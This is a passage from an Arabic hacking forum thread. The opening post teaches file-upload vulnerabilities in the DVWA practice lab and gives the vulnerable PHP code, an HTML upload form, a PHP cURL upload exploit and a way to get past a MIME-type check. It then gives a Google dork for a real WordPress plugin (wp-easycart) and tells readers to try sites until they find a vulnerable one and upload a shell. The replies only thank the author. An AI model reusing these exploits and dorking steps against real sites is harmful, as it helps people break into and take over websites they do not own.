1. V!rus-MarOc

    V!rus-MarOc Developer

    الأنتساب:
    ‏26 ديسمبر 2011
    المشاركات:
    55
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    8
    الوظيفة:
    Hacker
    الإقامة:
    ©MAЯΘ
    بسم الله الرحمــــن الرحيم

    السلام عليكم

    راح استخدم في الشرح مختبر الاختراق dvwa

    اول شيء اكتشاف التغرة

    نلاحظ الكود التالي


    كود PHP:
     <?php
        
    if (isset($_POST['Upload'])) {

                
    $target_path DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
                
    $target_path $target_path basename$_FILES['uploaded']['name']);

                if(!
    move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                    
                    
    $html .= '<pre>';
                    
    $html .= 'Your image was not uploaded.';
                    
    $html .= '</pre>';
                    
                  } else {
                
                    
    $html .= '<pre>';
                    
    $html .= $target_path ' succesfully uploaded!';
                    
    $html .= '</pre>';
                    
                }

            }
    ?> 
    اكتر الدوال مسببة للتغرة انتشارا هي move_uploaded_file و copy

    الكود اعلى مصاب و الاصابة في دالة move_uploaded_file

    شرح للدالة هنا و هنا ايضا

    شرح الكود

    كود PHP:
     <?php
        
    if (isset($_POST['Upload'])) { // يتحقق من ادى تم طلب الرفع

                
    $target_path DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/"// مسار رفع الملف
                
    $target_path $target_path basename$_FILES['uploaded']['name']); // المسار الكامل مع اسم الملف الدي تم رفعه

                
    if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) { // يتم رفع الملف بدون التحقق من اي شيء الى المسار الموضوع اعلاه
                    
                    
    $html .= '<pre>';
                    
    $html .= 'Your image was not uploaded.'// ادا رفع الملف بنجاح يطبع الجملة التالية
                    
    $html .= '</pre>';
                    
                  } else {
                
                    
    $html .= '<pre>';
                    
    $html .= $target_path ' succesfully uploaded!'// ادا لم يرفع الملف يطبع الجملة التالية
                    
    $html .= '</pre>';
                    
                }

            }
    ?> 
    تمام ، ننتقل لكتابة الاستغلال

    الاستغلال ب html لا يحتاج شرح ، فاللغة سهلة جدا :{13}:

    كود PHP:
    <html>
    <
    form method="POST" action="http://localhost/pentest/tuto/dvwalab/vulnerabilities/upload/" enctype="multipart/form-data">
    <
    input name="uploaded" type="file" />
    <
    input type="submit" name="Upload" value="Upload" />
    </
    html>
    بعد الاستغلال

    [​IMG]

    php

    راح نستخدم مكتبة curl

    نعمل function للرفع مع مراعاة اسماء الفورم في التغرة الي هي

    كود PHP:
    uploaded
    الفنكشن كالتالي

    كود PHP:
    function upl($x$f){
        
    $ch curl_init($x); // الاتصال بالموقع
        
    $post = array(    "Upload"=>true,  // قيم البوسط المراد ارسالها ، المف و تأكيد الرفع
                        
    "uploaded"=>"@"    .    $f);
        
    curl_setopt($chCURLOPT_POSTtrue);
        
    curl_setopt($chCURLOPT_POSTFIELDS$post); // ارسال القيم
        
    curl_setopt($chCURLOPT_RETURNTRANSFER1); // العودة بسورس بعد انتهاء العملية
        
    curl_exec($ch); // تنفيد
        
    curl_close($ch); // اغلاق
    }
    و نعم تحقق من ادا تم رفع الملف

    باستخدام path في التغرة

    كود PHP:
    $target_path $target_path basename$_FILES['uploaded']['name']);
    و شكل الاستغلال سيكون كالتالي

    كود PHP:
     <?php
    set_time_limit
    (0);
    error_reporting(0);

    if(
    preg_match('/hamza/'file_get_contents("http://localhost/pentest/tuto/dvwalab/hackable/uploads/1.txt"))){ // يتحقق من الملف هل رفع
        
    echo"uploaded"// ادا رفع يطبع الجملة التالية
    }else{
        echo
    "error"// ادا لم يرفع يطبع الجملة التالية
    }

    function 
    upl($x$f){
        
    $post = array(    "Upload"=>"upload",  // قيم البوسط المراد ارسالها ، المف و تأكيد الرفع
                        
    "uploaded"=>"@"    .    $f);
        
    $ch curl_init($x); // الاتصال بالموقع
        
    curl_setopt($chCURLOPT_COOKIEFILE'cookie.txt'); // كوكيز للدخول اللوحة (غير مهم)
        
    curl_setopt($chCURLOPT_POSTtrue);
        
    curl_setopt($chCURLOPT_POSTFIELDS$post); // ارسال القيم
        
    curl_setopt($chCURLOPT_RETURNTRANSFER1); // العودة بسورس بعد انتهاء العملية
        
    $data curl_exec($ch); // تنفيد
        
    curl_close($ch); // اغلاق
        
    return $data;
    تمام ، في بعض المرات تصادف بعض المشاكل متل

    كود PHP:
     <?php
        
    if (isset($_POST['Upload'])) {

                
    $target_path DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
                
    $target_path $target_path basename($_FILES['uploaded']['name']);
                
    $uploaded_name $_FILES['uploaded']['name'];
                
    $uploaded_type $_FILES['uploaded']['type'];
                
    $uploaded_size $_FILES['uploaded']['size'];

                if ((
    $uploaded_type == "image/jpeg") && ($uploaded_size 100000)){


                    if(!
    move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                    
                        
    $html .= '<pre>';
                        
    $html .= 'Your image was not uploaded.';
                        
    $html .= '</pre>';
                        
                      } else {
                    
                        
    $html .= '<pre>';
                        
    $html .= $target_path ' succesfully uploaded!';
                        
    $html .= '</pre>';
                        
                        }
                }
                else{
                    echo 
    '<pre>Your image was not uploaded.</pre>';
                }
            }
    ?> 
    الاختلاف او هاي الكود يتحقق من نوع الملف المرفوع و حجمه

    كود PHP:
    if (($uploaded_type == "image/jpeg") && ($uploaded_size 100000)){
    التخطي يكون بتغيير نوع الملف اتناء الارسال
    عن طريق live http headers او tamper data
    متال في الصورة

    from

    [​IMG]

    to

    [​IMG]

    و الناتج

    [​IMG]

    و شرح للاختراق بواسطتها
    ندهب الى احد مواقع الحماية او الى قسم التغرات
    ناحد اي تغرة و نشرح عليها
    كمثال التغرة التالية

    [WARNING]1337Day Agreement - 1337day Inj3ct0r Exploit Database : vulnerability : 0day : new exploits : buy and sell private exploit : shellcode by Inj3ct0r Team[/WARNING]
    نعمل دورك للتغرة
    كود PHP:
    inurl:plugins/wp-easycart
    و نبحت عن مواقع في google

    [​IMG]

    و تجرب موقع موقع حتى تجد موقع مصاب و ترفع عليه الشل

    الى هنا يكون انتهى الموضوع :ُeُiy:
     
    1 person likes this.
  2. al_98r

    al_98r Developer

    الأنتساب:
    ‏21 يوليو 2014
    المشاركات:
    112
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    يعطيك العآآفيه على الشرح
    ماآ قصرت ..
    :ُ{10}:ُ​
     
  3. karwan

    karwan DeveloPer Plus

    الأنتساب:
    ‏7 يناير 2013
    المشاركات:
    121
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    18
    الإقامة:
    "{IRAQ}"
    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    السلام عليكم ورحمة الله وبركاته

    يـــعــطــيـــك الـــعــافـــيــه
     
  4. xdvb

    xdvb Developer

    الأنتساب:
    ‏1 أغسطس 2014
    المشاركات:
    72
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    يعطيك العآآفيه على الشرح
     
  5. nasern

    nasern Active DeveloPer

    الأنتساب:
    ‏26 مارس 2012
    المشاركات:
    93
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    يعطيك العافيه
     
  6. nasern

    nasern Active DeveloPer

    الأنتساب:
    ‏26 مارس 2012
    المشاركات:
    93
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    ماذا تعتقد في مشاركة V!rus-MarOc؟يعجبني ويستحق التقييم
     
  7. coiffa

    coiffa Developer

    الأنتساب:
    ‏1 يناير 2013
    المشاركات:
    41
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    موضوع رائع ويستحق التقييم
     
  8. ElHaZeN

    ElHaZeN Developer

    الأنتساب:
    ‏20 أكتوبر 2014
    المشاركات:
    21
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    تسلم ايديك يا وحش
     
  9. Mokhalad HaXor

    Mokhalad HaXor آداريً شؤون الأعضًاء

    الأنتساب:
    ‏3 يوليو 2012
    المشاركات:
    3,319
    الإعجابات المتلقاة:
    2,463
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Hacking
    الإقامة:
    etc/shadow
    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    بارك الله بيك حبيبي موضوع جميل جدآ
    لاتحرمنا من جديدك يا ورد
    {1!$7}
     

مشاركة هذه الصفحة